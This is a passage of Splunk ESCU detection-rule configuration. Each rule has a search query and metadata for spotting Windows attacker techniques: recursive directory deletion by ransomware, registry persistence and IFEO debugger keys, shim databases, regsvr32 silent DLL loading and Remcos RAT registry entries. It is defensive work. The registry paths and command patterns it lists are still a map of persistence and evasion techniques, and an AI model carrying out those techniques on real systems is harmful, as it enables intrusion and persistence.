= 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Recursive Delete of Directory In Batch CMD - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070.004", "T1070"], "nist": ["DE.CM"]} schedule_window = 
auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious commandline designed to delete files or directory recursive using batch command. This technique was seen in ransomware (reddot) where it it tries to delete the files in recycle bin to impaire user from recovering deleted files. action.notable.param.rule_title = Recursive Delete of Directory In Batch CMD action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` Processes.process=*/c* Processes.process="* rd *" Processes.process="*/s*" Processes.process="*/q*" by Processes.user Processes.process_name Processes.parent_process_name Processes.parent_process Processes.process Processes.process_id Processes.dest |`drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `recursive_delete_of_directory_in_batch_cmd_filter` [ESCU - Reg exe Manipulating Windows Services Registry Keys - Rule] action.escu = 0 action.escu.enabled = 1 description = The search looks for reg.exe modifying registry keys that define Windows services and their configurations. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.011", "T1574"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for reg.exe modifying registry keys that define Windows services and their configurations. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. 
These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = It is unusual for a service to be created or modified by directly manipulating the registry. However, there may be legitimate instances of this behavior. It is important to validate and investigate, as appropriate. action.escu.creation_date = 2020-11-26 action.escu.modification_date = 2020-11-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Reg exe Manipulating Windows Services Registry Keys - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Service Abuse", "Windows Persistence Techniques", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = A reg.exe process $process_name$ with commandline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Reg exe 
Manipulating Windows Services Registry Keys - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Service Abuse", "Windows Persistence Techniques", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 60, "impact": 75, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.011", "T1574"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search looks for reg.exe modifying registry keys that define Windows services and their configurations. action.notable.param.rule_title = Reg exe Manipulating Windows Services Registry Keys action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.process_name) as process_name values(Processes.parent_process_name) as parent_process_name values(Processes.user) as user FROM datamodel=Endpoint.Processes where Processes.process_name=reg.exe Processes.process=*reg* Processes.process=*add* Processes.process=*Services* by Processes.process_id Processes.dest Processes.process | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `reg_exe_manipulating_windows_services_registry_keys_filter` [ESCU - Registry Keys for Creating SHIM Databases - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for registry activity associated with application compatibility shims, which can be leveraged by attackers for various nefarious purposes. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.011", "T1546"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for registry activity associated with application compatibility shims, which can be leveraged by attackers for various nefarious purposes. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = There are many legitimate applications that leverage shim databases for compatibility purposes for legacy applications action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Registry Keys for Creating SHIM Databases - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Windows Registry Activities", "Windows Persistence Techniques", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = A registry activity in $registry_path$ related to shim modication in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - 
Registry Keys for Creating SHIM Databases - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Windows Registry Activities", "Windows Persistence Techniques", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.011", "T1546"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for registry activity associated with application compatibility shims, which can be leveraged by attackers for various nefarious purposes. action.notable.param.rule_title = Registry Keys for Creating SHIM Databases action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=*CurrentVersion\\AppCompatFlags\\Custom* OR Registry.registry_path=*CurrentVersion\\AppCompatFlags\\InstalledSDB*) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `registry_keys_for_creating_shim_databases_filter` [ESCU - Registry Keys Used For Persistence - Rule] action.escu = 0 action.escu.enabled = 1 description = The search looks for modifications or alterations made to registry keys that have the potential to initiate the launch of an application or service during system startup. 
By monitoring and detecting modifications in these registry keys, we can identify suspicious or unauthorized changes that could be indicative of malicious activity. This proactive approach helps in safeguarding the system's integrity and security by promptly identifying and mitigating potential threats that aim to gain persistence or execute malicious actions during the startup process. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.001", "T1547"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for modifications or alterations made to registry keys that have the potential to initiate the launch of an application or service during system startup. By monitoring and detecting modifications in these registry keys, we can identify suspicious or unauthorized changes that could be indicative of malicious activity. This proactive approach helps in safeguarding the system's integrity and security by promptly identifying and mitigating potential threats that aim to gain persistence or execute malicious actions during the startup process. action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the endpoint data model in the registry node. This is typically populated via endpoint detection-and-response product, such as Carbon Black or endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the registry. action.escu.known_false_positives = There are many legitimate applications that must execute on system startup and will use these registry keys to accomplish that task. 
action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Registry Keys Used For Persistence - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AsyncRAT", "Ransomware", "Windows Persistence Techniques", "DarkGate Malware", "NjRAT", "RedLine Stealer", "IcedID", "Sneaky Active Directory Persistence Tricks", "Chaos Ransomware", "Azorult", "DHS Report TA18-074A", "Emotet Malware DHS Report TA18-201A", "Remcos", "Windows Registry Abuse", "Qakbot", "Suspicious MSHTA Activity", "Suspicious Windows Registry Activities", "Warzone RAT", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Amadey", "BlackByte Ransomware", "CISA AA23-347A", "Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = A registry activity in $registry_path$ related to persistence in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 76}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 76}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Registry Keys Used For Persistence - Rule action.correlationsearch.annotations = {"analytic_story": ["AsyncRAT", "Ransomware", "Windows Persistence Techniques", "DarkGate Malware", "NjRAT", "RedLine Stealer", "IcedID", "Sneaky Active Directory Persistence Tricks", "Chaos Ransomware", "Azorult", "DHS Report TA18-074A", "Emotet Malware DHS Report TA18-201A", "Remcos", "Windows Registry Abuse", "Qakbot", "Suspicious MSHTA 
Activity", "Suspicious Windows Registry Activities", "Warzone RAT", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Amadey", "BlackByte Ransomware", "CISA AA23-347A", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 95, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.001", "T1547"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search looks for modifications or alterations made to registry keys that have the potential to initiate the launch of an application or service during system startup. By monitoring and detecting modifications in these registry keys, we can identify suspicious or unauthorized changes that could be indicative of malicious activity. This proactive approach helps in safeguarding the system's integrity and security by promptly identifying and mitigating potential threats that aim to gain persistence or execute malicious actions during the startup process. 
action.notable.param.rule_title = Registry Keys Used For Persistence action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where (Registry.registry_path=*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce OR Registry.registry_path=*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run OR Registry.registry_path= "*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\*" OR Registry.registry_path= "*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\*" OR Registry.registry_path=*\\currentversion\\run* OR Registry.registry_path=*\\currentVersion\\Windows\\Appinit_Dlls* OR Registry.registry_path=*\\CurrentVersion\\Winlogon\\Shell* OR Registry.registry_path=*\\CurrentVersion\\Winlogon\\Notify* OR Registry.registry_path=*\\CurrentVersion\\Winlogon\\Userinit* OR Registry.registry_path=*\\CurrentVersion\\Winlogon\\VmApplet* OR Registry.registry_path=*\\currentversion\\policies\\explorer\\run* OR Registry.registry_path=*\\currentversion\\runservices* OR Registry.registry_path=HKLM\\SOFTWARE\\Microsoft\\Netsh\\* OR Registry.registry_path= "*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Common Startup" OR Registry.registry_path= *\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SharedTaskScheduler OR Registry.registry_path= *\\Classes\\htmlfile\\shell\\open\\command OR (Registry.registry_path="*Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options*" AND Registry.registry_key_name=Debugger) OR (Registry.registry_path="*\\CurrentControlSet\\Control\\Lsa" AND Registry.registry_key_name="Security Packages") OR 
(Registry.registry_path="*\\CurrentControlSet\\Control\\Lsa\\OSConfig" AND Registry.registry_key_name="Security Packages") OR (Registry.registry_path="*\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\*") OR (Registry.registry_path="*currentVersion\\Windows" AND Registry.registry_key_name="Load") OR (Registry.registry_path="*\\CurrentVersion" AND Registry.registry_key_name="Svchost") OR (Registry.registry_path="*\\CurrentControlSet\Control\Session Manager"AND Registry.registry_key_name="BootExecute") OR (Registry.registry_path="*\\Software\\Run" AND Registry.registry_key_name="auto_update")) by Registry.dest Registry.user Registry.registry_path Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.registry_key_name | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `registry_keys_used_for_persistence_filter` [ESCU - Registry Keys Used For Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for modifications to registry keys that can be used to elevate privileges. The registry keys under "Image File Execution Options" are used to intercept calls to an executable and can be used to attach malicious binaries to benign system binaries. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.012", "T1546"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for modifications to registry keys that can be used to elevate privileges. The registry keys under "Image File Execution Options" are used to intercept calls to an executable and can be used to attach malicious binaries to benign system binaries. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. 
If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = There are many legitimate applications that must execute upon system startup and will use these registry keys to accomplish that task. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Registry Keys Used For Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Cloud Federated Credential Abuse", "Hermetic Wiper", "Windows Privilege Escalation", "Windows Registry Abuse", "Data Destruction", "Suspicious Windows Registry Activities"] action.risk = 1 action.risk.param._risk_message = A registry activity in $registry_path$ related to privilege escalation in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 76}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 76}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Registry Keys Used For Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Cloud Federated Credential Abuse", "Hermetic Wiper", "Windows Privilege Escalation", "Windows Registry Abuse", "Data Destruction", "Suspicious Windows Registry Activities"], "cis20": ["CIS 10"], "confidence": 95, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.012", "T1546"], "nist": ["DE.CM"]} schedule_window = auto 
action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for modifications to registry keys that can be used to elevate privileges. The registry keys under "Image File Execution Options" are used to intercept calls to an executable and can be used to attach malicious binaries to benign system binaries. action.notable.param.rule_title = Registry Keys Used For Privilege Escalation action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path="*Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options*") AND (Registry.registry_value_name=GlobalFlag OR Registry.registry_value_name=Debugger)) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `registry_keys_used_for_privilege_escalation_filter` [ESCU - Regsvr32 Silent and Install Param Dll Loading - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a loading of dll using regsvr32 application with silent parameter and dllinstall execution. This technique was seen in several RAT malware similar to remcos, njrat and adversaries to load their malicious DLL on the compromised machine. This TTP may executed by normal 3rd party application so it is better to pivot by the parent process, parent command-line and command-line of the file that execute this regsvr32. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.010"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a loading of dll using regsvr32 application with silent parameter and dllinstall execution. This technique was seen in several RAT malware similar to remcos, njrat and adversaries to load their malicious DLL on the compromised machine. This TTP may executed by normal 3rd party application so it is better to pivot by the parent process, parent command-line and command-line of the file that execute this regsvr32. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Other third part application may used this parameter but not so common in base windows environment. 
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Regsvr32 Silent and Install Param Dll Loading - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["AsyncRAT", "Hermetic Wiper", "Living Off The Land", "Data Destruction", "Remcos", "Suspicious Regsvr32 Activity"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to load a DLL using the silent and dllinstall parameter.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 36}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 36}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Regsvr32 Silent and Install Param Dll Loading - Rule
action.correlationsearch.annotations = {"analytic_story": ["AsyncRAT", "Hermetic Wiper", "Living Off The Land", "Data Destruction", "Remcos", "Suspicious Regsvr32 Activity"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.010"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` AND Processes.process="*/i*" by Processes.dest Processes.parent_process Processes.process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where match(process,"(?i)[\-|\/][Ss]{1}") | `regsvr32_silent_and_install_param_dll_loading_filter`

[ESCU - Regsvr32 with Known Silent Switch Cmdline - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies Regsvr32.exe utilizing the silent switch to load DLLs. This technique has most recently been seen in IcedID campaigns to load its initial DLL that will download the 2nd stage loader that will download and decrypt the config payload. The switch type may be either a hyphen `-` or forward slash `/`. This behavior is typically found with `-s`, and it is possible there are more switch types that may be used. \
During triage, review parallel processes and capture any artifacts that may have landed on disk. Isolate and contain the endpoint as necessary.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.010"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies Regsvr32.exe utilizing the silent switch to load DLLs. This technique has most recently been seen in IcedID campaigns to load its initial DLL that will download the 2nd stage loader that will download and decrypt the config payload. The switch type may be either a hyphen `-` or forward slash `/`. This behavior is typically found with `-s`, and it is possible there are more switch types that may be used. \
During triage, review parallel processes and capture any artifacts that may have landed on disk. Isolate and contain the endpoint as necessary.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Minimal, but a network operator can use this application to load a DLL.
action.escu.creation_date = 2021-07-27
action.escu.modification_date = 2021-07-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Regsvr32 with Known Silent Switch Cmdline - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["IcedID", "Suspicious Regsvr32 Activity", "Remcos", "Living Off The Land", "Qakbot", "AsyncRAT"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to load a DLL using the silent parameter.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 56}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 56}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Regsvr32 with Known Silent Switch Cmdline - Rule
action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Suspicious Regsvr32 Activity", "Remcos", "Living Off The Land", "Qakbot", "AsyncRAT"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.010"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` by Processes.user Processes.process_name Processes.process Processes.parent_process_name Processes.original_file_name Processes.dest Processes.process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where match(process,"(?i)[\-|\/][Ss]{1}") | `regsvr32_with_known_silent_switch_cmdline_filter`

[ESCU - Remcos client registry install entry - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects the presence of a registry key related to the Remcos RAT agent on a host. This detection is made by a Splunk query to search for instances where the registry key "license" is found in the "Software\Remcos" path. This analytic combines information from two data models: Endpoint.Processes and Endpoint.Registry and retrieves process information such as user, process ID, process name, process path, destination, parent process name, parent process, and process GUID. This analytic also retrieves registry information such as registry path, registry key name, registry value name, registry value data, and process GUID. By joining the process GUID from the Endpoint.Processes data model with the process GUID from the Endpoint.Registry data model, the analytic identifies instances where the "license" registry key is found in the "Software\Remcos" path. This detection is important because it suggests that the host has been compromised by the Remcos RAT agent. Remcos is a well-known remote access Trojan that can be used by attackers to gain unauthorized access to systems and exfiltrate sensitive data. Identifying this behavior allows the SOC to take immediate action to remove the RAT agent and prevent further compromise. The impact of this attack can be severe, as the attacker can gain unauthorized access to the system, steal sensitive information, or use the compromised system as a launching point for further attacks. Next steps include using this analytic in conjunction with other security measures and threat intelligence to ensure accurate detection and response.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic detects the presence of a registry key related to the Remcos RAT agent on a host. This detection is made by a Splunk query to search for instances where the registry key "license" is found in the "Software\Remcos" path. This analytic combines information from two data models: Endpoint.Processes and Endpoint.Registry and retrieves process information such as user, process ID, process name, process path, destination, parent process name, parent process, and process GUID. This analytic also retrieves registry information such as registry path, registry key name, registry value name, registry value data, and process GUID. By joining the process GUID from the Endpoint.Processes data model with the process GUID from the Endpoint.Registry data model, the analytic identifies instances where the "license" registry key is found in the "Software\Remcos" path. This detection is important because it suggests that the host has been compromised by the Remcos RAT agent. Remcos is a well-known remote access Trojan that can be used by attackers to gain unauthorized access to systems and exfiltrate sensitive data. Identifying this behavior allows the SOC to take immediate action to remove the RAT agent and prevent further compromise. The impact of this attack can be severe, as the attacker can gain unauthorized access to the system, steal sensitive information, or use the compromised system as a launching point for further attacks. Next steps include using this analytic in conjunction with other security measures and threat intelligence to ensure accurate detection and response.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2022-11-14
action.escu.modification_date = 2022-11-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Remcos client registry install entry - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Remcos", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = A registry entry $registry_path$ with registry keyname $registry_key_name$ related to Remcos RAT in host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Remcos client registry install entry - Rule
action.correlationsearch.annotations = {"analytic_story": ["Remcos", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects the presence of a registry key related to the Remcos RAT agent on a host. This detection is made by a Splunk query to search for instances where the registry key "license" is found in the "Software\Remcos" path. This analytic combines information from two data models: Endpoint.Processes and Endpoint.Registry and retrieves process information such as user, process ID, process name, process path, destination, parent process name, parent process, and process GUID. This analytic also retrieves registry information such as registry path, registry key name, registry value name, registry value data, and process GUID. By joining the process GUID from the Endpoint.Processes data model with the process GUID from the Endpoint.Registry data model, the analytic identifies instances where the "license" registry key is found in the "Software\Remcos" path. This detection is important because it suggests that the host has been compromised by the Remcos RAT agent. Remcos is a well-known remote access Trojan that can be used by attackers to gain unauthorized access to systems and exfiltrate sensitive data. Identifying this behavior allows the SOC to take immediate action to remove the RAT agent and prevent further compromise. The impact of this attack can be severe, as the attacker can gain unauthorized access to the system, steal sensitive information, or use the compromised system as a launching point for further attacks. Next steps include using this analytic in 